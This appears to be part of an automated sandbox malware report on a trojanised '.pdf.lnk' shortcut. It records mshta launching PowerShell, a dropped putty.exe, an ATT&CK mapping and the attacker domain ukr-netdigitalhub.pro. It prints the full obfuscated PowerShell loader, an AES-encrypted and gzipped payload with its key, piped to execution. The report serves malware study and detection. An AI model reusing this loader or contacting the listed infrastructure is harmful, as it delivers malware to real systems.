);$ajwbpwyhl.close();$mnoljitf.close();[byte[]] $aeglbg = $pvqgtgpn.toarray();$qngjt = [system.text.encoding]::utf8.getstring($aeglbg);$qngjt \| powershell -
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop $eoxtm = 'aaaaaaaaaaaaaaaaaaaaaohrfbfb0z9ogaomosgiww1szkjpy8tdpzzdttrcphqqscnlpta757cp3/lp9gzqmswf/7chhfbpk5jnkm5l5gflmvieicknq3tczopwc82rcuki+cn+28+ygjkxer7fhv7bfptkkkl/ifcv5knblgzohjlo4alpfj3vvp9+w9dbho1jttlcglmu7vdwezbjha9uhoeleklptmwzhy6sbrt+2wzeq+deohartgbqosvdx1qi7jixqkp5ybiihsjs7u1qvr/sme9nmnrllj8ezre59uy+w09wbevvacexh61o6h2adtpepoyid9+yewu1dpb0gqmbzca9qdoulsjz6fvjagogymrt5s7xhny3b3k8fds6pli9rhngzogzd88e91dj6cp8l8l/0yhxqmbyzqwwtalfkji34qstydprftiikbj5nvpqsymwuairxlzraywuxfexcl3bsxmbhndhmmjl5uixljin3qbic2iew7jog9npirw1cjfuakc0y/jfaegey3taysenxusyn3/kdn7ojodxliwrjwharo3zsevhxh3ar969bzsawhe34ij3+d5oxidnjyriw04wuqmnspb1iiik4h4ozaiv0sv12apgf8m5nrhzju5xw+dcgvgscffx1dujkwq45ufm9okusl0jpvx/o+utl+c+fqgu6pua4cqcodudmnhchfijnxmid9n3adxaqrcb1tsg8brkp0ji3sj2d3edgc5erd3aztvlrvw9yldfwnkandky0xtyjy2el0nq1gjxlh9zeqqju5mwzdkryrq2mjmkbioruofhdgf1lbm0s6cglvrpnryhni9zo+hc3rm1f3c+nwnnfesgirnq8bkhrbbejpukvnyofethadpjdc7rwbzuvcvrz8pfmhswy+cnbj+miryu9mfjiv9ft4ykivpqsgizxkuu';$kpwuavgm = 'y1zpbw5ay0zut2xpv0zvd2fhbgnzs0z6b2hbshn5zvg=';$gnukiz = new-object 'system.security.cryptography.aesmanaged';$gnukiz.mode = [system.security.cryptography.ciphermode]::ecb;$gnukiz.padding = [system.security.cryptography.paddingmode]::zeros;$gnukiz.blocksize = 128;$gnukiz.keysize = 256;$gnukiz.key = [system.convert]::frombase64string($kpwuavgm);$hggdn = [system.convert]::frombase64string($eoxtm);$raraljdr = $hggdn[0..15];$gnukiz.iv = $raraljdr;$jhyjonfqz = $gnukiz.createdecryptor();$ugcnpubnf = $jhyjonfqz.transformfinalblock($hggdn, 16, $hggdn.length - 16);$gnukiz.dispose();$mnoljitf = new-object system.io.memorystream( , $ugcnpubnf );$pvqgtgpn = new-object system.io.memorystream;$ajwbpwyhl = new-object system.io.compression.gzipstream $mnoljitf, ([io.compression.compressionmode]::decompress);$ajwbpwyhl.copyto( $pvqgtgpn );$ajwbpwyhl.close();$mnoljitf.close();[byte[]] $aeglbg = $pvqgtgpn.toarray();$qngjt = [system.text.encoding]::utf8.getstring($aeglbg);$qngjt \| powershell -			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\putty.exe

Code function: 21_2_00007FF6BB2C7130 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorDacl,GetLastError,LocalFree,LocalFree,

21_2_00007FF6BB2C7130

Source: C:\Users\user\AppData\Local\Temp\putty.exe

Code function: 21_2_00007FF6BB2C7350 AllocateAndInitializeSid,AllocateAndInitializeSid,GetLastError,GetLastError,GetLastError,

21_2_00007FF6BB2C7350

Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: MonitorFromWindow,GetMonitorInfoA,GetDesktopWindow,GetClientRect,CreateWindowExW,GetLastError,MonitorFromWindow,MonitorFromWindow,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetWindowRect,GetClientRect,SetWindowPos,CreateBitmap,CreateCaret,SetScrollInfo,GetDoubleClickTime,GetSystemMenu,CreatePopupMenu,AppendMenuA,AppendMenuA,AppendMenuA,CreateMenu,DeleteMenu,DeleteMenu,AppendMenuA,AppendMenuA,GetKeyboardLayout,GetLocaleInfoA,ShowWindow,SetForegroundWindow,GetForegroundWindow,UpdateWindow,MsgWaitForMultipleObjects,PeekMessageW,IsWindow,DispatchMessageW,IsDialogMessageA,PeekMessageA,GetForegroundWindow,MsgWaitForMultipleObjects,DispatchMessageW,PeekMessageW,IsWindow,IsDialogMessageA,	21_2_00007FF6BB2853E3
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: EnumSystemLocalesW,	21_2_00007FF6BB359D30
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: GetLocaleInfoA,DefWindowProcW,	21_2_00007FF6BB281B9F
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: EnumSystemLocalesW,	21_2_00007FF6BB359A14
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	21_2_00007FF6BB359FB8
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	21_2_00007FF6BB359714
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: EnumSystemLocalesW,	21_2_00007FF6BB352EDC
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: GetLocaleInfoW,	21_2_00007FF6BB3523A8

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\putty.exe

Code function: 21_2_00007FF6BB32B500 CreateNamedPipeA,CreateEventA,GetLastError,

21_2_00007FF6BB32B500

Source: C:\Users\user\AppData\Local\Temp\putty.exe

Code function: 21_2_00007FF6BB33B168 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

21_2_00007FF6BB33B168

Source: C:\Users\user\AppData\Local\Temp\putty.exe

Code function: 21_2_00007FF6BB2FA3E0 GetProcAddress,GetUserNameA,GetUserNameA,

21_2_00007FF6BB2FA3E0

Source: C:\Users\user\AppData\Local\Temp\putty.exe

Code function: 21_2_00007FF6BB36697C _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

21_2_00007FF6BB36697C

Source: C:\Users\user\AppData\Local\Temp\putty.exe

Code function: 21_2_00007FF6BB2C79B0 GetVersionExA,GetProcAddress,

21_2_00007FF6BB2C79B0

Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2BFE90 socket,SetHandleInformation,setsockopt,getaddrinfo,htons,inet_addr,htonl,htonl,htons,bind,listen,closesocket,WSAGetLastError,closesocket,closesocket,WSAGetLastError,		21_2_00007FF6BB2BFE90
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2BF930 closesocket,socket,SetHandleInformation,setsockopt,setsockopt,setsockopt,htonl,htons,bind,WSAGetLastError,WSAGetLastError,htons,htonl,htons,connect,WSAGetLastError,		21_2_00007FF6BB2BF930

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	11 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	22 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	12 Process Injection	12 Obfuscated Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Email Collection	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	21 PowerShell	Logon Script (Windows)	Logon Script (Windows)	1 Software Packing	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	11 Input Capture	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	34 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	22 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	111 Masquerading	LSA Secrets	21 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	41 Virtualization/Sandbox Evasion	Cached Domain Credentials	11 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Process Injection	DCSync	41 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
filepdf.pdf.lnk.download.lnk	34%	ReversingLabs	Shortcut.Trojan.Boxter
filepdf.pdf.lnk.download.lnk	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\putty.exe	0%	ReversingLabs

Source	Detection	Scanner	Label
http://ukr-netdigitalhub.pro/x64dbg2?	0%	Avira URL Cloud	safe
http://ukr-netdigitalhub.pro/x64dbg2w4	0%	Avira URL Cloud	safe
http://ukr-netdigitalhub.pro/putty.exe	0%	Avira URL Cloud	safe
http://ukr-netdigitalhub.pro/putty	0%	Avira URL Cloud	safe
http://ukr-netdigitalhub.pro/x64dbg2	0%	Avira URL Cloud	safe
http://ukr-netdigitalhub.pro/putty.e	0%	Avira URL Cloud	safe
http://ukr-netdigitalhub.pro/x64dbg2B	0%	Avira URL Cloud	safe
http://ukr-netdigitalhub.pr	0%	Avira URL Cloud	safe
http://ukr-netdigitalhub.pro/x64dbg2...	0%	Avira URL Cloud	safe
http://ukr-netdigitalhub.pro/x64dbg2:	0%	Avira URL Cloud	safe
http://ukr-netdigitalhub.pro/x64dbg2ent	0%	Avira URL Cloud	safe
http://ukr-netdigitalhub.pro/x64dbg2...&	0%	Avira URL Cloud	safe
http://ukr-netdigitalhub.pro/	0%	Avira URL Cloud	safe
http://ukr-netdigitalhub.pro/pu	0%	Avira URL Cloud	safe
http://ukr-netdigitalhub.pro/put	0%	Avira URL Cloud	safe
http://ukr-netdigitalhub.pro/x64dbg2DataFPS_BROW	0%	Avira URL Cloud	safe
http://ukr-netdigitalhub.pro/p	0%	Avira URL Cloud	safe
http://ukr-netdigitalhub.pro/x64dbg2:asLMEMP	0%	Avira URL Cloud	safe
http://ukr-netdigitalhub.pro/x64dbg.pdf	100%	Avira URL Cloud	malware
http://ukr-netdigitalhub.pro/x64dbg2i	0%	Avira URL Cloud	safe
http://ukr-netdigitalhub.pro/x64dbg2l	0%	Avira URL Cloud	safe
http://ukr-netdigitalhub.pro	0%	Avira URL Cloud	safe
http://ukr-netdigitalhub.pro/putt	0%	Avira URL Cloud	safe
http://ukr-netdigitalhub.pro/x64dbg2W	0%	Avira URL Cloud	safe
http://ukr-netdigitalhub.pro/putty.	0%	Avira URL Cloud	safe
http://ukr-netdigitalhub.pro/x64dbg2http://ukr-netdigitalhub.pro/x64dbg2	0%	Avira URL Cloud	safe
http://ukr-netdigitalhub.pro/x64dbg2C:	0%	Avira URL Cloud	safe
http://ukr-netdigitalhub.pro/x64dbg2H	0%	Avira URL Cloud	safe
http://ukr-netdigitalhub.p	0%	Avira URL Cloud	safe
http://ukr-netdigitalhub.pro/putty.ex	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.214.172	true	false	high
ukr-netdigitalhub.pro	94.156.177.166	true	false	high
x1.i.lencr.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ukr-netdigitalhub.pro/x64dbg2	true	Avira URL Cloud: safe	unknown
http://ukr-netdigitalhub.pro/x64dbg.pdf	false	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ukr-netdigitalhub.pro/x64dbg2?	mshta.exe, 00000007.00000003.1377641844.0000022686E0A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ukr-netdigitalhub.pro/x64dbg2B	mshta.exe, 00000007.00000003.1377641844.0000022686E0A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	powershell.exe, 0000000D.00000002.1683139322.000001B4E1F90000.00000004.00000800.00020000.00000000.sdmp, putty.exe.13.dr	false		high
http://ocsp.sectigo.com0	powershell.exe, 0000000D.00000002.1683139322.000001B4E1F90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1604581139.000001B4D257B000.00000004.00000800.00020000.00000000.sdmp, putty.exe.13.dr	false		high
http://ukr-netdigitalhub.pr	powershell.exe, 0000000D.00000002.1604581139.000001B4D2504000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://ukr-netdigitalhub.pro/x64dbg2:	mshta.exe, 00000007.00000002.1432845185.0000022686D76000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1377641844.0000022686D8C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1429679889.0000022686D76000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ukr-netdigitalhub.pro/x64dbg2w4	mshta.exe, 00000007.00000002.1432845185.0000022686D76000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1429679889.0000022686D76000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 0000000D.00000002.1683139322.000001B4E1001000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ukr-netdigitalhub.pro/putty.e	powershell.exe, 0000000D.00000002.1604581139.000001B4D2504000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	powershell.exe, 0000000D.00000002.1683139322.000001B4E1F90000.00000004.00000800.00020000.00000000.sdmp, putty.exe.13.dr	false		high
